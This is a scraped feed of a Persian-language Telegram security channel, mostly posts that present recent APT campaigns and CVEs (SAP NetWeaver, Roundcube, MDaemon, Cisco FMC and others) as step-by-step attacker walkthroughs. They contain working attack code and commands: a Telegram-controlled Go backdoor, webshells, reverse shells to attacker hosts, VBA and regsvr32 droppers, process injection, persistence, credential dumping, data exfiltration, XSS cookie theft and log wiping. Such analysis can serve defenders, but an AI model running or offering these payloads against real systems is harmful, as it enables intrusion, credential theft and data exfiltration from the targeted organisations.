تو چن روز گذشته، محققای امنیت سایبری یه بکدور جدید مبتنی بر زبان برنامهنویسی Go (Golang) رو شناسایی کردن که از API ربات تلگرام برای برقراری ارتباطاتC2 استفاده میکنه. تو این پست میخوایم کمی این مورد رو بررسی فنیتر انجام بدیم که این تحلیل شامل راهاندازی سرور C2 با استفاده از تلگرام، روشهای دور زدن شناسایی، و ابزارهای مورد استفاده تو این حملهاس.
برای استفاده از API تلگرام به عنوان مرکز C2، باید مراحل زیر رو طی کنیم:
برای تعامل با API تلگرام، از لایبرری github.com/go-telegram-bot-api/telegram-bot-api استفاده میکنیم.
نمونه کد برای دریافت دستورات از تلگرام و اجرای اونا تو سیستم قربانی:
package main
import (
"log"
"os/exec"
"github.com/go-telegram-bot-api/telegram-bot-api"
)
func main() {
bot, err := tgbotapi.NewBotAPI("YOUR_BOT_TOKEN")
if err != nil {
log.Fatal(err)
}
u := tgbotapi.NewUpdate(0)
u.Timeout = 60
updates, err := bot.GetUpdatesChan(u)
for update := range updates {
if update.Message == nil {
continue
}
cmd := update.Message.Text
output, err := exec.Command("sh", "-c", cmd).Output()
if err != nil {
output = []byte(err.Error())
}
msg := tgbotapi.NewMessage(update.Message.Chat.ID, string(output))
bot.Send(msg)
}
}
این کد پیامهای دریافتی از ربات تلگرام رو پردازش میکنه. هر پیام به عنوان یه دستور سیستم اجرا شده و خروجی اون به مهاجم ارسال میشه.
برای افزایش شانس اجرای موفقیتآمیز، چندین تکنیک دور زدن شناسایی به کار گرفته میشه.
GOOS=linux GOARCH=amd64 garble -literals build -o payload obfuscated.go
cp payload /usr/bin/systemd-networkd
chmod +x /usr/bin/systemd-networkd
echo '[Service]
ExecStart=/usr/bin/systemd-networkd
Restart=always' > /etc/systemd/system/networkd.service
systemctl enable networkd
systemctl start networkd
تو ویندوز، میشه از schtasks برای ایجاد یه تسک مخفی استفاده کرد:
schtasks /create /tn "WindowsUpdate" /tr "C:\Users\Public\malware.exe" /sc onlogon /ru SYSTEM /f
وقتی که نمیشه از تلگرام استفاده کرد، ngrok یه راه ارتباطی امن برای C2 فراهم میکنه.
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken YOUR_AUTH_TOKEN
./ngrok tcp 4444
بعد از اجرای این دستور، ngrok یک آدرس tcp:// ایجاد میکنه که مهاجم میتونه برای ارتباط استفاده کنه.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - go-telegram-bot-api/telegram-bot-api: Golang bindings for the Telegram Bot API
Golang bindings for the Telegram Bot API. Contribute to go-telegram-bot-api/telegram-bot-api development by creating an account on GitHub.
👍13🔥7❤3😍2💯2🍌2⚡1❤🔥1🎉1🤣1
اگه دسترسی به سرور قربانی از طریق آسیبپذیریهای تحت وب ممکن باشه، میشه یه webshell مستقر کرد:
<?php echo shell_exec($_GET['cmd']); ?>
این شل رو میشه با curl استفاده کرد:
curl "http://victim.com/shell.php?cmd=whoami"
اگه سرویسهای آسیبپذیر به سرریز بافر پیدا بشن، میشه از ابزار msfvenom برای ساخت پیلود استفاده کرد:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your-ip LPORT=4444 -f elf > payload.elf
و بعدش اونو تو سیستم هدف اجرا کرد:
chmod +x payload.elf
./payload.elf
برای جلوگیری از شناسایی، میشه از AES برای رمزگذاری ارتباطات استفاده کرد. نمونه کد رمزگذاری و رمزگشایی:
import (
"crypto/aes"
"crypto/cipher"
"encoding/hex"
)
func encrypt(data, key string) string {
block, _ := aes.NewCipher([]byte(key))
ciphertext := make([]byte, len(data))
stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
stream.XORKeyStream(ciphertext, []byte(data))
return hex.EncodeToString(ciphertext)
}
func decrypt(data, key string) string {
ciphertext, _ := hex.DecodeString(data)
block, _ := aes.NewCipher([]byte(key))
plaintext := make([]byte, len(ciphertext))
stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
stream.XORKeyStream(plaintext, ciphertext)
return string(plaintext)
}
برای اجرای مخفی تو ویندوز، میشه از regsvr32 استفاده کرد:
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll
این دستور باعث اجرای کد مخرب از طریق COM بدون ایجاد پردازش مشهود میشه.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍5💯3⚡1❤1👌1😍1🤣1🍌1
گروه Silver Fox APT از بدافزار Winos 4.0 برای نفوذ و کنترل سازمانهای تایوانی استفاده کرده. تو این گزارش، حمله رو از دیدگاه فنی بررسی میکنیم و ابزارها، تکنیکها، کدهای مخرب و روشهای استفادهشده رو تحلیل میکنیم.
theHarvester -d targetcompany.com -l 500 -b google
shodan search "port:3389 country:TW"
کد VBA مخرب تو فایل Word برای دانلود بدافزار Winos 4.0:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <کد_پایه64>"
End Sub
هکرها از CVE-2024-20700 (آسیبپذیری RCE تو ویندوز) برای اجرای کد از راه دور استفاده کردن.
تست آسیبپذیری با Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
استفاده از Hydra برای پیدا کردن پسوردهای ضعیف RDP
hydra -L user_list.txt -P password_list.txt rdp://target_ip
کد Winos 4.0 برای ایجاد ارتباط با سرور هکرها:
#include <windows.h>
#include <wininet.h>
int main() {
HINTERNET hInternet, hConnect;
hInternet = InternetOpen("Winos", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hConnect = InternetOpenUrl(hInternet, "http://attacker.com/payload.exe", NULL, 0, INTERNET_FLAG_RELOAD, 0);
if (hConnect) {
// دانلود و اجرای بدافزار اصلی
}
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return 0;
}
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, target_pid);
LPVOID pRemoteCode = VirtualAllocEx(hProcess, NULL, payload_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pRemoteCode, payload, payload_size, NULL);
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > winos4.exe
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍4🎉3❤2👏2👌2🕊1🏆1
آسیبپذیری با شناسه CVE-2025-21333، یه آسیبپذیری افزایش سطح دسترسی (LPE) تو درایور vkrnlintvsp.sysه که مربوطه به Hyper-V تو ویندوز. این نقص به دلیل یه Heap Overflow ایجاد شده که به هکر لوکال احراز هویتشده اجازه میده کنترل کامل حافظه کرنل رو در اختیارش بگیره و در نهایت به سطح دسترسی SYSTEM دست پیدا کنه.
درایور vkrnlintvsp.sys که بخشی از Hyper-Vه، وظیفه پردازش درخواستهای خاصی رو از ماشینهای مجازی داره. هکر میتونه با ارسال یک درخواست IOCTL خاص به این درایور، باعث شه که کرنل حافظه بیشتری از حد مجاز تو هیپ، اختصاص بده، اما بدون بررسی مقدار واقعی دادهای که تو اون نوشته میشه. این یعنی:
سرریز تو هیپ خطرناکتر از استکه، چرا که اگه بشه جداول تخصیص حافظه رو دستکاری کرد، میشه به طور دلخواه حافظه خواند/نوشت و به کرنل حمله کرد.
مهاجم برای سواستفاده از این نقص میتونه:
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Try Hack Box
CVE-2025-21333
Windows Hyper-V Zero-Day
https://github.com/MrAle98/CVE-2025-21333-POC
@TryHackBox
Windows Hyper-V Zero-Day
https://github.com/MrAle98/CVE-2025-21333-POC
@TryHackBox
👍10🔥4❤3❤🔥2👌2⚡1🎉1🤮1🌭1
mimikatz
privilege::debug
sekurlsa::logonpasswords
sqlite3 ~/.mozilla/firefox/*.default/cookies.sqlite "SELECT host, name, value FROM moz_cookies"
Get-ChildItem -Path C:\Users\ -Recurse -Filter *.docx,*.xlsx,*.pdf
neo4j console
bloodhound-python -u admin -p password -d targetcompany.com --collect all
psexec \\targetpc -u Admin -p Password -i C:\Users\Public\winos4.exe
dnscat2 --dns targetcompany.com
$webclient = New-Object System.Net.WebClient
$webclient.UploadFile("http://attacker.com/upload", "C:\Users\Public\secrets.zip")
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤4🔥3❤🔥2👌2⚡1🤮1🙏1💯1🏆1
گروه Lotus Panda یکی از گروههای APT چینیه که با استفاده از نسخه آپدیت شده Sagerunex Backdoor به هدفهایی تو حوزه دولت، مخابرات و صنایع حساس حمله کرده. این گروه از تکنیکهای پیشرفته نفوذ، بایپس مکانیزمهای امنیتی، و افزایش سطح دسترسی تو تارگت بهره میبره.
theHarvester -d target.com -l 500 -b google
nmap -sS -sV -p- -T4 target.com
shodan search "port:443 org:TargetOrganization"
Asunto: Actualización de seguridad obligatoria
Estimado usuario,
Hemos detectado una actividad sospechosa en su cuenta. Para verificar su información, descargue el archivo adjunto.
Atentamente,
Soporte Técnico
Invoke-WebRequest -Uri "http://maliciousserver.com/sagerunex.exe" -OutFile "C:\Users\Public\sagerunex.exe"
Start-Process "C:\Users\Public\sagerunex.exe"
import dropbox
ACCESS_TOKEN = "malicious-access-token"
dbx = dropbox.Dropbox(ACCESS_TOKEN)
def send_data(data):
dbx.files_upload(data.encode(), "/logs/data.txt")
send_data("Captured keystrokes and files")
winPEAS.bat > report.txt
کد ساخت یک DLL مخرب تو C++
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
system("cmd /c net user hacker P@ssw0rd! /add && net localgroup administrators hacker /add");
}
return TRUE;
}
x86_64-w64-mingw32-gcc -shared -o fake.dll fake.cpp -mwindows
Compress-Archive -Path "C:\sensitive-data" -DestinationPath "C:\data.zip"
certutil -encode "C:\data.zip" "C:\data.b64"
Remove-Item -Path "C:\Users\Public\sagerunex.exe" -Force
wevtutil cl Security
https://news.1rj.ru/str/safe_defense/136
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡11❤7👍7❤🔥4🔥2💩2🍌2👏1💯1🏆1
پست غیر فنی
این سریال معاویه رو اگه نگاه میکنین، خداوکیلی سرچ هم بکنین. آقا پر از دروغ تاریخیه. من کاری به دینی که دارین ندارم (البته که به منم ربطی نداره) اما اگه دنبال تاریخین (مثل من) حتما قسمت به قسمت سرچ کنین. پر دروغه. 😐
این سریال معاویه رو اگه نگاه میکنین، خداوکیلی سرچ هم بکنین. آقا پر از دروغ تاریخیه. من کاری به دینی که دارین ندارم (البته که به منم ربطی نداره) اما اگه دنبال تاریخین (مثل من) حتما قسمت به قسمت سرچ کنین. پر دروغه. 😐
👍117👎19👌8🤣7💩5❤4👏3🔥1
این آسیبپذیری یه stack-based buffer overflow تو نسخههای قبل از 22.7R2.5 از Ivanti Connect Secureه که به مهاجمای سایبری اجازه میده بدون احراز هویت، کد دلخواهشون رو بصورت ریموت اجرا کنن. این نقص تو دسامبر 2024 شناسایی و تو ژانویه 2025 پچ شد، اما قبل از اون تو حملاتی علیه سازمانهای ژاپنی مورد سوءاستفاده قرار گرفته بود.
تحلیل فنی:
اولین قدم اینه که بفهمیم چه سازمانهایی هنوز از نسخههای آسیبپذیر Ivanti Connect Secure (ICS) استفاده میکنن. اسکنرهایی مثل Shodan یا Censys برای این کار عالی هستن. با یه فیلتر ساده روی بنرهای SSL یا مسیرهای /dana-na/ راحت سرورهای ICS پیدا میشن.
http.noscript:"Welcome to Ivanti Connect Secure"
وقتی سرورهای هدف پیدا شدن، تست میکنیم ببینم نسخهی ICS آسیبپذیره یا نه. چون این آسیبپذیری یه stack-based buffer overflow توی یکی از کامپوننتهای مدیریت حافظهی ICS هست، معمولاً با یه درخواست ساده میشه کرش یا رفتار غیرعادی تو سرور ایجاد کرد.
curl -k -X POST https://victim-ics/dana-na/auth/url_default/login.cgi -d "reallylonginput=AAAAAA...."
اگر رفتار عجیبی دیدیم، سرور به احتمال زیاد آسیبپذیره.
وقتی مطمئن شدیم سیستم هدف آسیبپذیره، باید shell اولیه بگیریم. با توجه به اطلاعات لو رفته، اکثر هکرها از یه Perl Webshell ساده استفاده کردن که روی ICS دیپلوی شده. این Webshell با یک کوکی خاص فعال میشه.
curl -k --cookie "DSLogdSession=xyz" https://victim-ics/home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami
اگر جواب گرفتیم (مثلاً root یا admin)، یعنی کامل داخل سیستم هستیم.
حالا نوبت به نصب DslogdRAT میرسه که یه رت سبکه که از ارتباط رمزگذاری شده XOR استفاده میکنه. این رت فوقالعاده باهوشه؛ فعالیتش فقط بین ساعات اداری (8 صبح تا 2 بعدازظهر) هست تا وسط شب آلارم ایجاد نکنه.
هش مربوط به این رت:
1dd64c00f061425d484dd67b359ad99df533aa430632c55fa7e7617b55dab6a8
مراحل بعدی:
برای اینکه دسترسی طولانی داشته باشیم:
از ICS به عنوان یک pivot point استفاده میکنیم:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥8❤4👏2👌1💯1
تو آوریل ۲۰۲۵ (که امروز آخرین روزش هم هست)، گروهی از هکرهایی که گفته وابسته به ایران هستند با نام UNC2428، یه کمپین پیچیدهی مهندسی اجتماعی رو علیه اهداف اسرائیلی اجرا کردن. این عملیات با استفاده از آگهیهای شغلی جعلی به نام شرکت دفاعی اسرائیلی «رافائل» انجام شده و بدافزاری به نام MURKYTOUR رو توزیع کرده. که تو ادامه میخوایم این حمله رو کمی تحلیل کنیم.
نمایش فرم GUI فیک برای پرکردن اطلاعات شغلی
اجرا شدن ماژول بدافزاری تو بکگراند
انجام Persistence از طریق Scheduled Task و Registry: Run
Please open Telegram to view this post
VIEW IN TELEGRAM
❤21🔥8👍7👌4❤🔥3🥰2🤬2🍌1
گروه APT1 یکی از شناختهشدهترین گروههای هکریه که توسط دولت چین پشتیبانی میشه. این گروه توسط گزارش مشهور شرکت Mandiant تو سال ۲۰۱۳ افشا شد و به متهم شد به حملات سایبری متعدد علیه سازمانهای غربی. یکی از این شرکتها Westinghouse Electric Company بود. دلیل این انتخاب اینه که این شرکت یکی از شرکتهای کلیدی تو طراحی، ساخت، و راهاندازی نیروگاههای هستهای تو آمریکاست و همچنین تکنولوژی هستهای به کشورهای دیگر (مثل کره جنوبی و ژاپن) صادر میکرد. درحقیقت اومدن این شرکت رو هک کردن تا بتونن به اسناد تجاری و تکنولوژی این شرکت دست پیدا کنن. خب میریم سروقت تحلیلمون:
محتوای فایل:
نمونه کد ماکرو VBA:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://203.81.99.37/payload.ps1')"
End Sub
نمونه رفتار فرآیند:
Start-Process -FilePath "chrome_upd.exe" -ArgumentList "/silent /task:sync" -WindowStyle Hidden
Mimikatz:
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
PsExec:
psexec.exe \\TARGET -u admin -p password cmd.exe
نمونه اسکریپت:
$files = Get-ChildItem -Recurse -Path "C:\Engineering\ReactorDesigns\" -Include *.docx,*.pdf,*.dwg
Compress-Archive -Path $files.FullName -DestinationPath "C:\Temp\export.zip"
Invoke-WebRequest -Uri "http://203.81.99.37/upload" -Method POST -InFile "C:\Temp\export.zip"
schtasks /create /tn "Chrome Update" /tr "C:\Users\Public\chrome_upd.exe" /sc minute /mo 30
wevtutil cl Security
del /F /Q "C:\Users\*\AppData\Local\Temp\~*.log"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤🔥5🤬3⚡2🔥2💯2❤1🎉1🏆1
این endpoint به راحتی فایل رو با متد POST دریافت و روی سیستم ذخیره میکنه، بدون بررسی اینکه کاربر کیه. حالا اگه فایل آپلودی یه اسکریپت .jsp باشه، SAP NetWeaver اون رو به عنوان یه asset داینامیک لود میکنه و روی سرور اجرا میکنه!
POST /developmentserver/metadatauploader HTTP/1.1
Host: target-victim.com
Content-Type: multipart/form-data; boundary=boundary
--boundary
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
--boundary--
http://target-victim.com/VCService/shell.jsp?cmd=whoami
و تمام! کد روی سرور اجرا میشه.
curl -X POST http://victim.com/developmentserver/metadatauploader \
-F "file=@shell.jsp" -H "Content-Type: multipart/form-data"
محتوای shell.jsp:
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
while ((line = reader.readLine()) != null) {
out.println(line);
}
%>
curl "http://victim.com/VCService/shell.jsp?cmd=cat /etc/passwd"
بعد از اکسپلویت چی نصب کردن؟ یه reverse shell به سبک GoLang به اسم SuperShell. این ابزار مثل Cobalt Strike ولی سبکتر و stealthتره.
فایل .jsp یه curl یا wget ساده میزنه به سرور CDNشون و فایل Golang shell رو دانلود میکنه:
<%
String[] cmd = {"/bin/sh", "-c", "wget http://malicious.cn/supershell -O /tmp/sshell; chmod +x /tmp/sshell; /tmp/sshell &"};
Runtime.getRuntime().exec(cmd);
%>
هکرها فقط یه RCE ساده نزدن، کل ساختار حمله شبیه یه kill-chain پیشرفتهست:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤🔥4🔥4❤2🙏2💯2🎉1👌1
Shodan + Censys:
shodan search 'http.noscript:"MDaemon Webmail"' country:"RO"
whatweb http://mail.target.gov.ro
nmap -sV -p 3000-9000 mail.target.gov.ro
نتایج نشان داد که چندین هدف در اوکراین، رومانی و قبرس از نسخههای آسیبپذیر MDaemon Webmail استفاده میکنند (نسخههای قبل از 24.5.1).
آسیبپذیری XSS Reflected در پارامترهای سمت کلاینت در فرم پاسخدهی ایمیل:
POST /WorldClient.dll?View=Compose&Action=ReplyTo
Content-Type: application/x-www-form-urlencoded
body=<img src=x onerror="fetch('https://attacker.com/x?'+document.cookie)">
هنگام مشاهده پاسخ ایمیل توسط کاربر، کد JS اجرا میشود. اجرای کد در context دامنه MDaemon باعث سرقت session cookie و دسترسی به اینترفیس وبمیل میشود.
let payload = `
fetch('https://c2-server.evil/steal', {
method: 'POST',
body: JSON.stringify({
cookies: document.cookie,
ua: navigator.userAgent,
loc: window.location.href
})
});
`;
<img src=x onerror="${payload}">spoof-mail.py --from 'gov@ministry.gov.ua' --to 'employee@target.gov.ro' \
--subject 'وضعیت اضطراری ملی' --html-file payload.html
ایمیلها از طریق SMTP سرور open relay در آفریقا ارسال شدند. از محتوای فریبنده با عنوان "یادداشت امنیت ملی فوری" استفاده کردیم.
Cookie: auth_session=dkj34k2j4k2j34k23j4
User-Agent: Mozilla/5.0 (Windows NT 10.0)
curl -b "auth_session=..." https://mail.target.gov.ro/WorldClient.dll?View=Inbox
GET /WorldClient.dll?View=Settings&Folder=Passwords
GET /WorldClient.dll?View=2FA&Export
SMTP Host: smtp.target.gov.ro
IMAP User: admin@target.gov.ro
IMAP Pass: ********
POST /WorldClient.dll?View=AppPassword&Create
Body: name=devtool&pass=VeryLongAppToken123
ذخیره Token در vault تیم مهاجم برای بازگشت در آینده.
{ "cookies": "...", "2fa": "...", "imap": "...", "metadata": "..." }Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥6❤5❤🔥3⚡2👏2💯2🎉1😍1🍌1
سروری با Roundcube Webmail (مثلاً نسخه 1.6.9) که دارای حسابهای کاربری معتبر و دسترسی از طریق اینترنت است.
$ whatweb mail.victim.com
mail.victim.com [200 OK] Roundcube, PHP, Apache, Country[US], Title[Welcome to Roundcube Webmail]
$ curl https://mail.victim.com/roundcube/ | grep Version
<meta name="generator" content="Roundcube Webmail 1.6.9">
از اونجایی که آسیبپذیری بعد از احراز هویت عمل میکنه، نیاز به یه حساب داریم:
Username: john@victim.com
Password: Company2023!
/program/actions/settings/upload.php
پذیرای پارامتر POST به اسم _fromاه که بدون اعتبارسنجی deserialize میشه. ما با ساخت یه آبجکت PHP مخرب، کد دلخواه رو روی سرور اجرا میکنیم.
class Exploit {
public $cmd;
function __destruct() {
system($this->cmd);
}
}
$exploit = new Exploit();
$exploit->cmd = "curl http://attacker.com/shell.sh | bash";
$serialized = serialize($exploit);O:7:"Exploit":1:{s:3:"cmd";s:33:"curl http://attacker.com/shell.sh | bash";}POST /roundcube/?_task=settings&_action=upload HTTP/1.1
Host: mail.victim.com
Cookie: roundcube_sessid=SESSIONID
Content-Type: multipart/form-data; boundary=----XYZ
Content-Length: ...
------XYZ
Content-Disposition: form-data; name="_from"
O:7:"Exploit":1:{s:3:"cmd";s:40:"wget http://attacker.com/rev.sh -O- | bash";}
------XYZ
Content-Disposition: form-data; name="userfile"; filename="fake.txt"
Content-Type: text/plain
(fake content)
------XYZ--
#!/bin/bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1
nc -lvnp 4444
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥12❤5👍3🔥2👏2⚡1🤯1🙏1💯1😈1👨💻1
#پادکست
🎤 اپیزود 88 رادیو امنیت - صدایی از تاریکی: ماجرای گنجشک درنده - یازدهم تیر 1404
💠 بررسی حمله سایبری به بانک سپه
⬅️ لینک CastBox
https://castbox.fm/vd/823884810
⏩ CyberWarfar
https://castbox.fm/vd/823884810
Please open Telegram to view this post
VIEW IN TELEGRAM
d.castbox.fm
Best free podcast app for Apple iOS and Android | Let words move you
Millions of podcasts for all topics. Listen to the best free podcast on Android, Apple iOS, Amazon Alexa, Google Home, Carplay, Android Auto, PC. Create...
❤10❤🔥3👍3⚡1👏1👌1💯1
حسابهای جیمیل کارمندای نهادهای دولتی، دیپلماتها، مؤسسات تحقیقاتی، و اهداف استراتژیک تو کشورهای غربی، بهویژه تو آمریکا و اتحادیه اروپا.
گروه APT29 با ارسال ایمیلهای فیشینگ هدفمند، قربانی رو به صفحاتی فیک هدایت میکنه که شباهت زیادی به صفحات لاگین واقعی گوگل دارن. اما نکته کلیدی اینجاست: حتی اگه قربانی احراز هویت دو مرحلهای (مثلاً کد SMS یا اپلیکیشن احراز هویت) رو وارد کنه، مهاجم همچنان میتونه دسترسی کامل بگیره.
گوگل به کاربرا اجازه میده برای اپلیکیشنهایی که از احراز هویت دو مرحلهای پشتیبانی نمیکنن، یه "رمز عبور اپلیکیشن" (App Password) تولید کنن. این رمز، یکبار مصرفه و نیازی به وارد کردن کد 2FA نداره.
Google Account → Security → Signing in to Google → App passwords
Please open Telegram to view this post
VIEW IN TELEGRAM
👌18🔥4❤3👍3❤🔥2🥴2👎1🤔1👨💻1
سلام. وقت بخیر دوستان.
اگر از دوستان کسی آمادگی رکورد دورههای آموزشی شامل حوزه امنیت، برنامهنویسی (مرتبط با امنیت) و شبکه رو داره (بصورت حضوری تو دفتر لیان با استفاده از تجهیزات مدرن)؛ میتونیم از طریق پیام خصوصی بنده، بیشتر در مورد جزئیات صحبت کنیم.
ضمنا اگر کسی رو هم میشناسین که امکان همکاری براشون فراهم هست، لطفا پیام بنده رو براشون ارسال کنین.
ارتباط از طریق آیدی:
@vahid_elmi
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
اگر از دوستان کسی آمادگی رکورد دورههای آموزشی شامل حوزه امنیت، برنامهنویسی (مرتبط با امنیت) و شبکه رو داره (بصورت حضوری تو دفتر لیان با استفاده از تجهیزات مدرن)؛ میتونیم از طریق پیام خصوصی بنده، بیشتر در مورد جزئیات صحبت کنیم.
ضمنا اگر کسی رو هم میشناسین که امکان همکاری براشون فراهم هست، لطفا پیام بنده رو براشون ارسال کنین.
ارتباط از طریق آیدی:
@vahid_elmi
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9❤4👏4🔥3🤮3
1. شناسایی (Reconnaissance)
nmap -sV -p 443,1812,1813 <target>
اسکن روی پورتهای 443 (Web UI) و 1812/1813 (RADIUS Authentication)
PORT STATE SERVICE VERSION
443/tcp open https Cisco Secure FMC WebUI
1812/udp open radius
1813/udp open radius-acct
وجود سرویس RADIUS روی FMC تأیید شد.
2. آمادهسازی Payload (Exploit Development)
نمونه دستور برای تست:
radtest "attacker; id;" password <FMC_IP> 1812 secret
اگه آسیبپذیر باشه، خروجی RADIUS شامل اجرای دستور id خواهد شد و تو لاگها یا پاسخ RADIUS مشاهده میشه.
3. اجرای Remote Code Execution (Initial Access)
radtest "user; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" pass <FMC_IP> 1812 secret
ابزار netcat روی سیستم مهاجم (nc -lvnp 4444) برای دریافت shell.
نتیجه: مهاجم یه Root Shell روی FMC به دست میآره.
4. تثبیت دسترسی (Persistence)
mkdir -p /root/.ssh
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
echo "* * * * * root curl http://ATTACKER_IP/beacon.sh | bash" >> /etc/crontab
curl -o /tmp/beacon http://ATTACKER_IP/beacon && chmod +x /tmp/beacon && /tmp/beacon &
5. حرکت جانبی (Lateral Movement)
مثال: استخراج credential ذخیرهشده تو FMC:
psql -U admin fmcdb -c "SELECT username,password FROM users;"
6. بهرهبرداری نهایی (Actions on Objectives)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15❤6👍4👏2⚡1❤🔥1💯1🏆1
Cyber Warfar
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11❤4👍3👏1👌1🤓1
وقتی اولین بار این کتاب رو دیدم، بیشتر از هر چیزی حس کردم لازمِ این روایت به زبان فارسی منتقل بشه. نه برای اینکه بگیم بقیه اشتباه کردن، بلکه چون این کتاب یه زاویهدید و دسترسی مستند به بخشی از دنیای سایبر میده که کمتر توی منابع فارسی به شکل منسجم و قابلفهم وجود داشته. به همین دلیل با دکتر رحیمیان تصمیم گرفتیم این اثر رو با دقت ترجمه کنیم تا هر کسی (چه متخصص باشه، چه مدیر، چه دانشجو یا فقط کنجکاو) بتونه ازش بهره ببره.
این کتاب، نوشته نیکول پرلروث، گزارشی عمیق و پرجزئیاته از بازار پنهون خرید و فروش آسیبپذیریهای زیرو-دی، برنامههای دولتی برای توسعه جنگافزارهای سایبری و رقابت بین قدرتها برای برتری تو فضای دیجیتال. پرلروث سالها بهعنوان خبرنگار امنیت سایبری کار کرده و از مصاحبه با بازیگران مختلف این میدون (از هکرها و دلالای آسیبپذیری نرمافزاری تا مقامات دولتی) روایتهایی میاره که هم تکوندهندهست و هم هشداردهنده.
ما توی ترجمه سعی کردیم دو چیز رو همزمان داشته باشیم: دقت فنی و روون بودن متن. یعنی هم اصطلاحات تخصصی درست منتقل بشه و هم متن طوری روون شده که خواننده حتی اگه از اول با واژهها آشنا نباشه، با جریان کتاب همراه بشه و خسته نشه. نتیجه این شده که این نسخه مناسبِ مدیرها، پژوهشگرها، دانشجوها، تیمهای امنیت و هر کسی که میخواد بفهمه دنیاهای پشت پردهی تهدیدات سایبری چهطور کار میکنن باشه.
چرا باید این کتاب رو بخونین؟
چون نشونههای روشنی میده از اینکه تهدیدات سایبری دیگه محدود به هکهای ساده و سرقت اطلاعات نیستن؛ این تهدیدها میتونن زیرساختها رو فلج کنن، سیاستها رو تحتتأثیر بذارن و در سطح بینالملل ابزاری از جنس قدرت بشن. خوندن این کتاب کمک میکنه دید استراتژیکتری نسبت به مدیریت ریسک، سرمایهگذاری تو امنیت و برنامهریزی دفاعی پیدا کنین.
این ترجمه رو انتشارات فناوران لیان (وابسته به گروه لیان) منتشر کرده و من و دکتر رحیمیان با تعهد کامل روی صحت و انتقال پیام کتاب کار کردیم. اگه دنبال یک منبع قابلاعتنا و درعینحال جذاب برای درک عمیقترِ جنگافزارهای سایبری هستین، این کتاب یه انتخاب ضروریه.
ضمنا برای 50 خرید اول کد تخفیف 25% لحاظ شده که میتونین از طریق لینک زیر و با کد تخفیف book-25، کتاب رو تهیه کنین:
https://liangroup.net/shop/This-Is-How-They-Tell-Me-the-World-Ends
ضمنا حتما بعد از مطالعه کتاب بهم فیدبک بدین.
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
این کتاب، نوشته نیکول پرلروث، گزارشی عمیق و پرجزئیاته از بازار پنهون خرید و فروش آسیبپذیریهای زیرو-دی، برنامههای دولتی برای توسعه جنگافزارهای سایبری و رقابت بین قدرتها برای برتری تو فضای دیجیتال. پرلروث سالها بهعنوان خبرنگار امنیت سایبری کار کرده و از مصاحبه با بازیگران مختلف این میدون (از هکرها و دلالای آسیبپذیری نرمافزاری تا مقامات دولتی) روایتهایی میاره که هم تکوندهندهست و هم هشداردهنده.
ما توی ترجمه سعی کردیم دو چیز رو همزمان داشته باشیم: دقت فنی و روون بودن متن. یعنی هم اصطلاحات تخصصی درست منتقل بشه و هم متن طوری روون شده که خواننده حتی اگه از اول با واژهها آشنا نباشه، با جریان کتاب همراه بشه و خسته نشه. نتیجه این شده که این نسخه مناسبِ مدیرها، پژوهشگرها، دانشجوها، تیمهای امنیت و هر کسی که میخواد بفهمه دنیاهای پشت پردهی تهدیدات سایبری چهطور کار میکنن باشه.
چرا باید این کتاب رو بخونین؟
